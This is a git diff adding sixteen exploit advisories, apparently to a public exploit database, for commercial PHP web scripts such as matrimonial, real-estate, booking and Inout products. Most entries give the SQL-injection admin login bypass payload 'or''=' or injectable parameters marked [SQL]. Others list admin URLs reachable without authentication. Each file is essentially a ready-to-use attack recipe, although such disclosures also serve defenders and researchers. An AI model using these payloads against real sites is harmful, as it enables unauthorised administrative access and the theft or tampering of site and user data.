diff --git a/files.csv b/files.csv index 03c2cc7e0..d03e74990 100644 --- a/files.csv +++ b/files.csv @@ -36981,3 +36981,19 @@ id,file,description,date,author,platform,type,port 41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0 +41043,platforms/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0 +41044,platforms/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0 +41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0 +41046,platforms/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0 +41047,platforms/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0 +41048,platforms/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0 +41049,platforms/php/webapps/41049.txt,"Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0 +41050,platforms/php/webapps/41050.txt,"Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0 +41051,platforms/php/webapps/41051.txt,"Inout SmartDeal 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0 +41052,platforms/php/webapps/41052.txt,"Inout QuerySpace 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0 +41053,platforms/php/webapps/41053.txt,"Inout CareerLamp 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0 +41054,platforms/php/webapps/41054.txt,"Inout SocialTiles 2.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0 +41055,platforms/php/webapps/41055.txt,"Inout Celebrities 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0 +41056,platforms/php/webapps/41056.txt,"Education Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0 +41058,platforms/php/webapps/41058.txt,"Professional Service Booking Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0 +41059,platforms/php/webapps/41059.txt,"Courier Business Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/41043.txt b/platforms/php/webapps/41043.txt new file mode 100755 index 000000000..f27e66189 --- /dev/null +++ b/platforms/php/webapps/41043.txt @@ -0,0 +1,12 @@ +# # # # # +# Vulnerability: Admin Login Bypass & SQLi +# Date: 13.01.2017 +# Vendor Homepage: http://scriptfirm.com/ +# Script Name: Professional Service Booking Script +# Script Buy Now: My Private Tutor Website +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41044.txt b/platforms/php/webapps/41044.txt new file mode 100755 index 000000000..5dca3da8a --- /dev/null +++ b/platforms/php/webapps/41044.txt @@ -0,0 +1,29 @@ +# # # # # +# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit +# Date: 13.01.2017 +# Vendor Homepage: http://www.phpmatrimonialscript.in/ +# Script Name: Hindu Matrimonial Script +# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# +# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. +# +# Direct entrance Add/Edit... +# http://localhost/[PATH]/admin/usermanagement.php +# http://localhost/[PATH]/admin/countrymanagement.php +# http://localhost/[PATH]/admin/communitymanagement.php +# http://localhost/[PATH]/admin/renewaldue.php +# http://localhost/[PATH]/admin/generalsettings.php +# http://localhost/[PATH]/admin/cms.php +# http://localhost/[PATH]/admin/cms.php +# http://localhost/[PATH]/admin/newsletter1.php +# http://localhost/[PATH]/admin/payment.php +# http://localhost/[PATH]/admin/searchview.php +# http://localhost/[PATH]/admin/success_story.php +# http://localhost/[PATH]/admin/featured.php +# http://localhost/[PATH]/admin/photo.php +# http://localhost/[PATH]/admin/googleads.php +# http://localhost/[PATH]/admin/reports.php +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41045.txt b/platforms/php/webapps/41045.txt new file mode 100755 index 000000000..e1358bc52 --- /dev/null +++ b/platforms/php/webapps/41045.txt @@ -0,0 +1,12 @@ +# # # # # +# Vulnerability: Admin Login Bypass & SQLi +# Date: 13.01.2017 +# Vendor Homepage: http://scriptfirm.com/ +# Script Name: Just Dial Marketplace Script +# Script Buy Now: http://scriptfirm.com/just-dial-marketplace +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41046.txt b/platforms/php/webapps/41046.txt new file mode 100755 index 000000000..02c652e0f --- /dev/null +++ b/platforms/php/webapps/41046.txt @@ -0,0 +1,12 @@ +# # # # # +# Vulnerability:: Admin Login Bypass & SQLi +# Date: 13.01.2017 +# Vendor Homepage: http://www.phpmatrimonialscript.in/ +# Script Name: Entrepreneur Matrimonial Script +# Script Buy Now: http://www.phpmatrimonialscript.in/product/entrepreneur-matrimonial/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41047.txt b/platforms/php/webapps/41047.txt new file mode 100755 index 000000000..d38f6deec --- /dev/null +++ b/platforms/php/webapps/41047.txt @@ -0,0 +1,16 @@ +# # # # # +# Vulnerability: SQL Injection + Admin Login Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://phprealestatescript.org/ +# Script Name: Open Source Real-Estate Script +# Script Buy Now: http://phprealestatescript.org/open-source-real-estate-script.html +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/viewpropertydetails.php?id=[SQL] +# +# Admin Login Bypass +# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41048.txt b/platforms/php/webapps/41048.txt new file mode 100755 index 000000000..fa5751fc9 --- /dev/null +++ b/platforms/php/webapps/41048.txt @@ -0,0 +1,22 @@ +# # # # # +# Vulnerability: Security Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://www.inoutscripts.com/ +# Script Name: Inout StickBoard Script +# Script Version: v1.0 +# Script Buy Now: http://www.inoutscripts.com/demo/inout-stickboard/demo/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Direct entrance Add/Edit/Del... +# An attacker can exploit this issue via a browser. +# The following example URIs are available: +# http://localhost/[PATH]/admin/account/clearcache +# http://localhost/[PATH]/admin/account/changeprofileimage +# http://localhost/[PATH]/admin/account/changepassword +# http://localhost/[PATH]/admin/pin/websitepin +# http://localhost/[PATH]/admin/user/manage +# http://localhost/[PATH]/admin/user/userdetails/69 +# Vs....... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41049.txt b/platforms/php/webapps/41049.txt new file mode 100755 index 000000000..110739a6b --- /dev/null +++ b/platforms/php/webapps/41049.txt @@ -0,0 +1,21 @@ +# # # # # +# Vulnerability: Security Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://www.inoutscripts.com/ +# Script Name: Inout Search Engine Ultimate Edition Script +# Script Version: v7.0, v8.0 +# Script Buy Now: http://www.inoutscripts.com/demo/inout-search-engine/demo/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Direct entrance.. +# An attacker can exploit this issue via a browser. +# The following example URIs are available: +# http://localhost/[PATH]/admin/index.php?page=engine/manage_suggestion +# http://localhost/[PATH]/admin/index.php?page=databaseengine/managesettings +# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add +# http://localhost/[PATH]/admin/index.php?page=seasonallogo/manage +# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add +# Vs....... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41050.txt b/platforms/php/webapps/41050.txt new file mode 100755 index 000000000..3b8e9159e --- /dev/null +++ b/platforms/php/webapps/41050.txt @@ -0,0 +1,22 @@ +# # # # # +# Vulnerability: Security Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://www.inoutscripts.com/ +# Script Name: Inout Webmail Ultimate Edition v4.0 +# Script Version: Ultimate Edition v4.0, Ultimate Hypertable Version +# Script Buy Now: http://www.inoutscripts.com/demo/inout-webmail/demo/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Direct entrance.. +# An attacker can exploit this issue via a browser. +# The following example URIs are available: +# http://localhost/[PATH]/admin/index.php?page=ads/sponsoredlinks +# http://localhost/[PATH]/admin/index.php?page=todolist/todolist +# http://localhost/[PATH]/admin/index.php?page=statistics/registration_showgraph +# http://localhost/[PATH]/admin/index.php?page=statistics/showgraph +# http://localhost/[PATH]/admin/index.php?page=statistics/accountactivity +# http://localhost/[PATH]/admin/index.php?page=calendar/calendar +# Vs....... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41051.txt b/platforms/php/webapps/41051.txt new file mode 100755 index 000000000..ad33d4d37 --- /dev/null +++ b/platforms/php/webapps/41051.txt @@ -0,0 +1,19 @@ +# # # # # +# Vulnerability: Security Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://www.inoutscripts.com/ +# Script Name: Inout SmartDeal Script +# Script Version: v1.0 +# Script Buy Now: http://www.inoutscripts.com/demo/inout-smartdeal/demo/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Direct entrance.. +# An attacker can exploit this issue via a browser. +# The following example URIs are available: +# http://localhost/[PATH]/admin/index.php?page=account/changepassword +# http://localhost/[PATH]/admin/index.php?page=country/addcountry +# http://localhost/[PATH]/admin/index.php?page=account/addbank +# Vs....... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41052.txt b/platforms/php/webapps/41052.txt new file mode 100755 index 000000000..f167977d7 --- /dev/null +++ b/platforms/php/webapps/41052.txt @@ -0,0 +1,17 @@ +# # # # # +# Vulnerability: Security Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://www.inoutscripts.com/ +# Script Name: Inout QuerySpace Script +# Script Version: v1.0 +# Script Buy Now: http://www.inoutscripts.com/demo/inout-queryspace/demo/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Direct entrance.. +# An attacker can exploit this issue via a browser. +# The following example URIs are available: +# http://localhost/[PATH]/admin/user/search +# Vs....... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41053.txt b/platforms/php/webapps/41053.txt new file mode 100755 index 000000000..3817441e0 --- /dev/null +++ b/platforms/php/webapps/41053.txt @@ -0,0 +1,19 @@ +# # # # # +# Vulnerability: Security Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://www.inoutscripts.com/ +# Script Name: Inout CareerLamp Script +# Script Version: v1.0 +# Script Buy Now: http://www.inoutscripts.com/demo/inout-careerlamp/demo/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Direct entrance.. +# An attacker can exploit this issue via a browser. +# The following example URIs are available: +# http://localhost/[PATH]/admin/statistics/js_registration_showgraph +# http://localhost/[PATH]/admin/statistics/accountactivity +# http://localhost/[PATH]/admin/statistics/js_showgraph +# Vs....... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41054.txt b/platforms/php/webapps/41054.txt new file mode 100755 index 000000000..f3b447ecd --- /dev/null +++ b/platforms/php/webapps/41054.txt @@ -0,0 +1,18 @@ +# # # # # +# Vulnerability: Security Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://www.inoutscripts.com/ +# Script Name: Inout SocialTiles Script +# Script Version: v2.0 +# Script Buy Now: http://www.inoutscripts.com/demo/inout-socialtiles/demo/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Direct entrance.. +# An attacker can exploit this issue via a browser. +# The following example URIs are available: +# http://localhost/[PATH]/admin/index.php?page=account/statussettings +# http://localhost/[PATH]/admin/index.php?page=account/newad +# Vs....... +# # # # # diff --git a/platforms/php/webapps/41055.txt b/platforms/php/webapps/41055.txt new file mode 100755 index 000000000..5ac537348 --- /dev/null +++ b/platforms/php/webapps/41055.txt @@ -0,0 +1,18 @@ +# # # # # +# Vulnerability: Security Bypass +# Date: 13.01.2017 +# Vendor Homepage: http://www.inoutscripts.com/ +# Script Name: Inout Celebrities Script +# Script Version: v1.0 +# Script Buy Now: http://www.inoutscripts.com/demo/inout-celebrities/demo/ +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# Direct entrance.. +# An attacker can exploit this issue via a browser. +# The following example URIs are available: +# http://localhost/[PATH]/admin/settings/managersssettings +# http://localhost/[PATH]/admin/settings/addrsssettings +# Vs....... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41056.txt b/platforms/php/webapps/41056.txt new file mode 100755 index 000000000..5afdf42ce --- /dev/null +++ b/platforms/php/webapps/41056.txt @@ -0,0 +1,12 @@ +# # # # # +# Vulnerability:: Admin Login Bypass & SQLi +# Date: 13.01.2017 +# Vendor Homepage: http://scriptfirm.com/ +# Script Name: Education Website Script +# Script Buy Now: http://scriptfirm.com/education-website +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41058.txt b/platforms/php/webapps/41058.txt new file mode 100755 index 000000000..f50e34d7d --- /dev/null +++ b/platforms/php/webapps/41058.txt @@ -0,0 +1,16 @@ +# # # # # +# Vulnerability: Admin Login Bypass & SQLi +# Date: 13.01.2017 +# Vendor Homepage: http://scriptfirm.com/ +# Script Name: Professional Service Booking Script +# Script Buy Now: http://scriptfirm.com/professional-service-booking-engine +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. +# SQL Injection/Exploit : +# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL] +# http://localhost/[PATH]/content.php?page=[SQL] +# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41059.txt b/platforms/php/webapps/41059.txt new file mode 100755 index 000000000..156b9b96f --- /dev/null +++ b/platforms/php/webapps/41059.txt @@ -0,0 +1,12 @@ +# # # # # +# Vulnerability: Admin Login Bypass & SQLi +# Date: 13.01.2017 +# Vendor Homepage: http://scriptfirm.com/ +# Script Name: Courier Business Website Script +# Script Buy Now: http://scriptfirm.com/courier-business-website +# Author: İhsan Şencan +# Author Web: http://ihsan.net +# Mail : ihsan[beygir]ihsan[nokta]net +# # # # # +# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. +# # # # # \ No newline at end of file